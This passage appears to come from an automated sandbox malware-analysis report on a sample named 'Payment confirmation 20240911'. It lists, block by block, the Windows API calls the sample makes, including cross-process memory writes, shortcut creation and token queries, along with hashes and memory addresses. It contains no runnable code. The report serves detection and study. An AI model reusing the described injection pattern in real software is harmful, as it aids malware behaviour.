                                          • CLSIDFromProgID.OLE32 ref: 0131A874
                                          • ProgIDFromCLSID.OLE32(?,00000000), ref: 0131A88F
                                          • lstrcmpiW.KERNEL32(?,00000000), ref: 0131A89D
                                          • CoTaskMemFree.OLE32(00000000), ref: 0131A8AD
                                          • CLSIDFromString.OLE32(?,?), ref: 0131A8B9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: d08d79e81f5f9b89c89f1b9693d0b7617b4c1fbd86c05eee4560f79dae91bda9
                                          • Instruction ID: 09a83c0c079d6608b268a63e3697ff4ae35a15b6905181cee7285059af56a192
                                          • Opcode Fuzzy Hash: d08d79e81f5f9b89c89f1b9693d0b7617b4c1fbd86c05eee4560f79dae91bda9
                                          • Instruction Fuzzy Hash: 67018F76601205AFEB244FA8DC48B9ABFEDEF44356F108024FE45D3218D770DD418BA0
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0131B7A5
                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0131B7AF
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0131B7BE
                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0131B7C5
                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0131B7DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: a47465934a1584470f93ef2515eefd966ac88c6e55c290949ee51ec17ff294c7
                                          • Instruction ID: 86b7d5e96e83800db7a36dd2aae87d4b5e7de7f3b526420103450d5f1bfb9a83
                                          • Opcode Fuzzy Hash: a47465934a1584470f93ef2515eefd966ac88c6e55c290949ee51ec17ff294c7
                                          • Instruction Fuzzy Hash: 9BF04F71240204AFEB211FA9AC89E677BBCFF46759F148019FA81C7158DA6198518B60
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0131B806
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0131B810
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B81F
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B826
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0131B83C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 46498e9061f2eb9741c2ab96357b6e586ed38e6b403463f12b77b77f94b05615
                                          • Instruction ID: 8aeea5cef0b7ff5aa88697ab8d6354bab1595e100cadd11fbcafa0f79a4ca9d9
                                          • Opcode Fuzzy Hash: 46498e9061f2eb9741c2ab96357b6e586ed38e6b403463f12b77b77f94b05615
                                          • Instruction Fuzzy Hash: 31F04F75200244AFEB211FA9EC88F677F7CFF46B58F104029FA81C7158CA619851CB60
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0131FA8F
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0131FAA6
                                          • MessageBeep.USER32(00000000), ref: 0131FABE
                                          • KillTimer.USER32 ref: 0131FADA
                                          • EndDialog.USER32 ref: 0131FAF4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: a6e2622e81caf0846be2a394f51918c8b9a69b145f76b3a2c25bc0a0469a80d9
                                          • Instruction ID: 90480de265f7d47f0d5f0059a77c0147ac9082be5d765f24c7dbef915527073c
                                          • Opcode Fuzzy Hash: a6e2622e81caf0846be2a394f51918c8b9a69b145f76b3a2c25bc0a0469a80d9
                                          • Instruction Fuzzy Hash: 9B018131600705ABFB359B54DD4EB967BBCBF00B09F044159E283A54E5DBF8A9488F80
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: f7ab14ebb3f369d088d22742da1f3301279ec2ec62bac1500a76e28c1c0a18cf
                                          • Instruction ID: 7036b696c0cf4ec94e7bc4aa6ab2944dc579ed9d8d7db6b63508b8230f266ebc
                                          • Opcode Fuzzy Hash: f7ab14ebb3f369d088d22742da1f3301279ec2ec62bac1500a76e28c1c0a18cf
                                          • Instruction Fuzzy Hash: 58F0F930110209EBDB755F69F90CB647FEDBB11362F588228F6A9481F8C7788596DF10
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 0132FAB2
                                          • CoCreateInstance.OLE32(0136DA7C,00000000,00000001,0136D8EC,?), ref: 0132FACA
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • CoUninitialize.OLE32 ref: 0132FD2D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                          • String ID: .lnk
                                          • API String ID: 2683427295-24824748
                                          • Opcode ID: 8da616f9f25d2707f9b75f4ccb2a97ee24c6a41187030a0da3ff95a59a496ba6
                                          • Instruction ID: b7aa402d5eb25208ec198d62436227d03f28ab0a941a366b46a28c58cc82a33d
                                          • Opcode Fuzzy Hash: 8da616f9f25d2707f9b75f4ccb2a97ee24c6a41187030a0da3ff95a59a496ba6
                                          • Instruction Fuzzy Hash: 72A140B1514206AFD300EF94C894EABB7EDEF99704F40492DF195D7191EB70EA09CB92
                                          APIs
                                            • Part of subcall function 013278AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 013278CB
                                          • CoInitialize.OLE32(00000000), ref: 0132F04D
                                          • CoCreateInstance.OLE32(0136DA7C,00000000,00000001,0136D8EC,?), ref: 0132F066
                                          • CoUninitialize.OLE32 ref: 0132F083
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                          • String ID: .lnk
                                          • API String ID: 2126378814-24824748
                                          • Opcode ID: a2fb3f3123b1f9e530ed5ad5ae10d9318c83980ff1abca84441f88440f3dfac7
                                          • Instruction ID: 8e1ec3ae7a1263d747d131da4e9152a1398d32c04286375b95e1f1076080679a
                                          • Opcode Fuzzy Hash: a2fb3f3123b1f9e530ed5ad5ae10d9318c83980ff1abca84441f88440f3dfac7
                                          • Instruction Fuzzy Hash: 29A135756143119FCB10EF54C884D2ABBF9FF89324F148988E99A9B361DB31EC45CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$+
                                          • API String ID: 0-2552117581
                                          • Opcode ID: a99dd3ed056c363cb2be35cd83ad6d2d4e33f44cb8cf4eb82c5c246ac3cf8fed
                                          • Instruction ID: d9e7323aeafa920c8d32ab3d4afbc2e985d80674ed76d1d1ada8c78507cab45f
                                          • Opcode Fuzzy Hash: a99dd3ed056c363cb2be35cd83ad6d2d4e33f44cb8cf4eb82c5c246ac3cf8fed
                                          • Instruction Fuzzy Hash: FF51243510425ADFEF19DFACC454AF9BBA4EF1A714F144069EE819B290E7309896CB20
                                          APIs
                                          • CharUpperBuffW.USER32(0000000C,00000016), ref: 0132507B
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 012EB8A7: _memmove.LIBCMT ref: 012EB8FB
                                          • CharUpperBuffW.USER32(?,?), ref: 013250FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                                          • String ID: REMOVE$THIS
                                          • API String ID: 2528338962-776492005
                                          • Opcode ID: 44e8ec356d206f3f9edf1499ee0a562d79d6fd6fe1c4da193aa11bd6599b4407
                                          • Instruction ID: f9d4235d2eb0e4b816411aaa6cd8babe5f6a9357381be4430d7d7574bf31bba5
                                          • Opcode Fuzzy Hash: 44e8ec356d206f3f9edf1499ee0a562d79d6fd6fe1c4da193aa11bd6599b4407
                                          • Instruction Fuzzy Hash: 6D418275A0021A9FDF01EF68C884ABEB7F5FF48218F148059D95AAB351D734ED45CB50
                                          APIs
                                            • Part of subcall function 01324D41: WriteProcessMemory.KERNEL32 ref: 01324D6B
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0131CFC9
                                            • Part of subcall function 01324D0C: ReadProcessMemory.KERNEL32 ref: 01324D36
                                            • Part of subcall function 01324C65: GetWindowThreadProcessId.USER32(?,?), ref: 01324C90
                                            • Part of subcall function 01324C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0131C9C2,00000034,?,?,00001004,00000000,00000000), ref: 01324CA0
                                            • Part of subcall function 01324C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0131C9C2,00000034,?,?,00001004,00000000,00000000), ref: 01324CB6
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0131D036
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0131D083
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: a850a0609406dedbba4142205e40228cd46ece8f2813321db49d24d520081acc
                                          • Instruction ID: f8adf284a21dfd65ddf414158e7a28e3c4b3db461183b2d2d9c6a46a56c5341c
                                          • Opcode Fuzzy Hash: a850a0609406dedbba4142205e40228cd46ece8f2813321db49d24d520081acc
                                          • Instruction Fuzzy Hash: 7A415072900229BFDB15EF98CC84FDEBBB8EF55704F108095EA45B7180DA706E45CB61
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0134A4E6
                                          • GetWindowLongW.USER32 ref: 0134A503
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0134A513
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: cac002a58466aaea3b18915bcb4d12f47d46da50758d017f0625857a79f5cfea
                                          • Instruction ID: 27f1f5f53d9e021f6e53420a91446bf98d17c564a6150f9b1cf5c4285e17f435
                                          • Opcode Fuzzy Hash: cac002a58466aaea3b18915bcb4d12f47d46da50758d017f0625857a79f5cfea
                                          • Instruction Fuzzy Hash: A031A535240206AFDB219E78CC44BEA7BA9FF49338F144725F9B6A32E0D734E8519B50
                                          APIs
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0134A668
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0134A67D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: '$`"u
                                          • API String ID: 3850602802-1436103891
                                          • Opcode ID: c3987e161e075fb2b135d131c6b8be14498eaf427502f87da927c9b2df27972b
                                          • Instruction ID: 998d9b4c7168832dbf590d9f2f9b44bfe7a0c37fd89fc74e0d53f19f2615b9c5
                                          • Opcode Fuzzy Hash: c3987e161e075fb2b135d131c6b8be14498eaf427502f87da927c9b2df27972b
                                          • Instruction Fuzzy Hash: A5410875A40209DFDB54CFA8D980BDA7BF9FB49314F10406AE946AB345D770A941CF90
                                          APIs
                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0134983D
                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0134984D
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 01349872
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$MoveWindow
                                          • String ID: Listbox
                                          • API String ID: 3315199576-2633736733
                                          • Opcode ID: 711827a30cf0121e89f04138671b431d66fe7e713c924b5d5582d578e72e03df
                                          • Instruction ID: 4ef4c85dee1a733aa2f9e8ad7791eb112103bcc4bf9c2ba4657a1073d0901408
                                          • Opcode Fuzzy Hash: 711827a30cf0121e89f04138671b431d66fe7e713c924b5d5582d578e72e03df
                                          • Instruction Fuzzy Hash: 4A218331610118BFEF228F59CC85FAB3BAEEF8D76CF018124F9555B191C671AC5187A0
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0134A27B
                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0134A290
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0134A29D
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: msctls_trackbar32
                                          • API String ID: 3850602802-1010561917
                                          • Opcode ID: 485430126d78311e70c7a5afe73bf96583598c66b42be01166e5dd79ca625dce
                                          • Instruction ID: 5aa5a9b89d4386e3ae275aed8d4e5438df0c80139d083765a7e4f670bf319d20
                                          • Opcode Fuzzy Hash: 485430126d78311e70c7a5afe73bf96583598c66b42be01166e5dd79ca625dce
                                          • Instruction Fuzzy Hash: 08113671240308BFEF215F65CC05FA73BECEF88B18F014128FA42A7090C272A821DB60
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0134D786
                                          • GetFocus.USER32(?,00000000,00000000,?,?,?,0135F381,?,?,?,?,?), ref: 0134D78E
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          • SendMessageW.USER32(007542E0,000000B0,000001BC,000001C0), ref: 0134D800
                                          Similarity
                                          • API ID: Window$Long$FocusForegroundMessageSend
                                          • String ID: `"u
                                          • API String ID: 3601265619-810275233
                                          • Opcode ID: 1a4f23c56a63a321b01865d20dfbd5c080cd7c3c45579d3a763c24f56c39e6c0
                                          • Instruction ID: c20582426b1ebabfdb736cdbd2200f96fe29b891d25671db56eff45e40ec9526
                                          • Opcode Fuzzy Hash: 1a4f23c56a63a321b01865d20dfbd5c080cd7c3c45579d3a763c24f56c39e6c0
                                          • Instruction Fuzzy Hash: A00196356002008FD7259E6CD884A757FE9BB89324F59426DD519873A5DB316806CB50
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01303028,?), ref: 01302F79
                                          • GetProcAddress.KERNEL32(00000000), ref: 01302F80
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RoInitialize$combase.dll
                                          • API String ID: 2574300362-340411864
                                          • Opcode ID: 68249c6668112657e4b6391286adede09c269aa91e8c436798228591ec4cd010
                                          • Instruction ID: cd93a26edae67a879866e37208082cb311627bedcddaaaab3ce8feb73b6f2565
                                          • Opcode Fuzzy Hash: 68249c6668112657e4b6391286adede09c269aa91e8c436798228591ec4cd010
                                          • Instruction Fuzzy Hash: 8BE01A78794300ABEBB15FB6EC4DB9536ACA704B4AF408028F142D6198CBB55054EF05
                                          APIs
                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,01302F4E), ref: 0130304E
                                          • GetProcAddress.KERNEL32(00000000), ref: 01303055
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RoUninitialize$combase.dll
                                          • API String ID: 2574300362-2819208100
                                          • Opcode ID: 4ff0a8aadc7cfd7a995d086c8bbc2db7bb7d9667473661b7722d445ee8d027e7
                                          • Instruction ID: f2510c36a13f685ac94ae80b4701e3cd37791a7b4474e4ac90f05d8988e843d0
                                          • Opcode Fuzzy Hash: 4ff0a8aadc7cfd7a995d086c8bbc2db7bb7d9667473661b7722d445ee8d027e7
                                          • Instruction Fuzzy Hash: 08E0ECB8B49300EFEB359FA2ED0DB553AACB714706F504118F14BD62ACCBB66010DB14
                                          Similarity
                                          • API ID: LocalTime__swprintf
                                          • String ID: %.3d$WIN_XPe
                                          • API String ID: 2070861257-2409531811
                                          • Opcode ID: b337772a6e28452127b9e716892a04c499b1ff5ddfc8bcbba4ed3fbb0bb159c0
                                          • Instruction ID: 7ca04130116895542452023ab325e9334272847d4649c1c671b4fcf4b1b1a66a
                                          • Opcode Fuzzy Hash: b337772a6e28452127b9e716892a04c499b1ff5ddfc8bcbba4ed3fbb0bb159c0
                                          • Instruction Fuzzy Hash: 2EE0127181801CEADB95C6918D16DFAF3BDBB04A09F0184D2FD5691808D735DB548B11
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6B4
                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo,?,?), ref: 012FE6C6
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: 695a85b4fb37196ad7ac2045e659de40a244b092bd4c322bd79c7754f9a74030
                                          • Instruction ID: 445331bf99f62c1ec2f3db3c639d3b5e67684699123ab07bb3c46a8e1d95727e
                                          • Opcode Fuzzy Hash: 695a85b4fb37196ad7ac2045e659de40a244b092bd4c322bd79c7754f9a74030
                                          • Instruction Fuzzy Hash: 2CD05E34910B169EDB325B6AA44860277D8AB04206F02943DE69A91224D6B0C4808750
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 012FE6F1
                                          • GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?), ref: 012FE703
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: IsWow64Process$kernel32.dll
                                          • API String ID: 2574300362-3024904723
                                          • Opcode ID: 105c1a3013b0f4fdb5cc1597f2dd240dd981db2adade2ea1dbbc672ae4c5dcf3
                                          • Instruction ID: 126807a689fa067a28c0cad8603e5ac5b871e54761312519bdfe2d37c3170644
                                          • Opcode Fuzzy Hash: 105c1a3013b0f4fdb5cc1597f2dd240dd981db2adade2ea1dbbc672ae4c5dcf3
                                          • Instruction Fuzzy Hash: EED05E349107139ADB356B66A4886037BD8AF04604F02842DE7DA92221D7B0C4808750
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0133EBC7
                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,0133EBAF,?,0133EAAC), ref: 0133EBD9
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                          • API String ID: 2574300362-1816364905
                                          • Opcode ID: b52708df711f0755d94653d2afd1a02b1a81e0f72423ac2ca3751ff8f701ab3d
                                          • Instruction ID: b1fa955233dd4c635aeac87301a220a0f68e0a69f3389b68ab5e949d58535f5c
                                          • Opcode Fuzzy Hash: b52708df711f0755d94653d2afd1a02b1a81e0f72423ac2ca3751ff8f701ab3d
                                          • Instruction Fuzzy Hash: 40D05E345087129BDB355F76A448A0236D8AB44308F10C42DE4D791220DAB0D8808760
                                          APIs
                                          • LoadLibraryA.KERNEL32(oleaut32.dll), ref: 01321389
                                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser,?,01321440), ref: 0132139B
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                                          • API String ID: 2574300362-1071820185
                                          • Opcode ID: df0af1a996cbda5d3221624c3fb3748aef6b8ae4aaf7b39737c524fcca48529c
                                          • Instruction ID: 2843329f8f08416de9457db8d7be1fe190d6a9ee4a4d2213efa5fdb99e61e4af
                                          • Opcode Fuzzy Hash: df0af1a996cbda5d3221624c3fb3748aef6b8ae4aaf7b39737c524fcca48529c
                                          • Instruction Fuzzy Hash: F4D0C774904722DFDB705FBAE50974276D8BF0471DF14841DE9D7D1714D6B4D4809750
                                          APIs
                                          • LoadLibraryA.KERNEL32(oleaut32.dll), ref: 013213B4
